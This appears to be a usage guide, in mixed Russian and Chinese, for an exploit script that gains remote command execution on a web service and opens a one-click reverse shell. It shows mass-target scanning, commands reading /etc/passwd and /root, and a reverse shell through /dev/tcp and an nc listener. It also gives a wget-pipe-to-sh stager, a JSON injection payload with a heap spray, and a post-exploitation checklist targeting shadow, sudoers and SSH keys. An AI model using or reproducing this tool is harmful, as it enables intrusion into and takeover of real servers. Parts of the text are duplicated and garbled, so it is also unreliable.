
Включает обнаружение выполняемых команд и получение шелла в один клик (требуется развёртывание сервиса на сервере)
Включает обнаружение выполняемых команд и однонажатие получения оболочки (требуется развертывание сервера) pco.yaml в сочетании с nuclei позволяет быстро обнаруживать
python go.py
Введите целевой URL → выберите пункт меню.
# 快速探测(8 项基本信息)
python go.py -t https://IP:PORT --probe fast
# 深度探测(全部命令:30+ 项)
python go.py -t https://IP:PORT --probe deep
# 批量探测
python go.py -f vulnerable_targets.txt --probe fast
python go.py -t https://IP:PORT -c "hostname"
python go.py -t https://IP:PORT -c "ls -la /root"
python go.py -t https://IP:PORT -c "cat /etc/passwd"
# 批量并发(20 线程)
python go.py -f targets.txt -c "hostname" --batch 20
Откройте два терминала на атакующей машине:
# 终端 1 - HTTP 服务(提供 rev.sh)
echo 'bash -i >& /dev/tcp/YOUR_IP/8088 0>&1' > index.html
python3 -m http.server 8087
# 终端 2 - 等待反弹
nc -lvnp 8088
Затем отправьте payload:
# 单目标
python go.py -t https://IP:PORT -l YOUR_IP -p 8087 -n 8088
# 批量(串行,一次只能接一个)
python go.py -f targets.txt -l YOUR_IP -p 8087 -n 8088
Скрипт выводит подготовительные шаги перед отправкой.
| Категория | Команда |
|---|---|
| Базовая информация | hostname, uname -a, kernel, OS release, uptime |
| Пользователи | id, whoami, users/w/who |
| Сеть | ifconfig, route, arp, listening ports, connections, iptables |
| Система | processes, cpuinfo, meminfo, disk, mount |
| Файлы | ls / /root /tmp /home /etc |
| Конфигурация | crontab, passwd, shadow, sudoers, SSH keys |
| Расширения | config search, scripts, docker, containers |
{"cmd":"getall","apiuser":"''''","apipass":"BBBBB",
"g0":"AAAAAAAAAAAAAAAA'; <命令> #", ...}
apiuser="''''" вызывает ошибку escape_quotes() с отсутствием нулевого завершенияg0~g60 куча-спрей 61 раз для повышения успешности'; <команда> # закрывает контекст, # комментирует остальноеДоступно 34 символа без использования echo tag:
wget -O- IP:PORT|sh (31 字符)
Цепочка: wget загрузка → sh выполнение → bash обратное соединение на указанный порт.
| Параметр | Назначение |
|---|---|
-t, --target URL | Целевой адрес |
-f, --file FILE | Файл со списком целей |
-l, --lhost IP | IP атакующей машины |
-p, --lport PORT | Порт HTTP-сервера (по умолчанию 8087) |
-n, --ncport PORT | Порт прослушивания nc (по умолчанию 8088) |
-c, --cmd CMD | Выполнить команду |
--probe fast/deep | Быстрое/глубокое обнаружение |
--batch N | Количество параллельных запросов (по умолчанию последовательно) |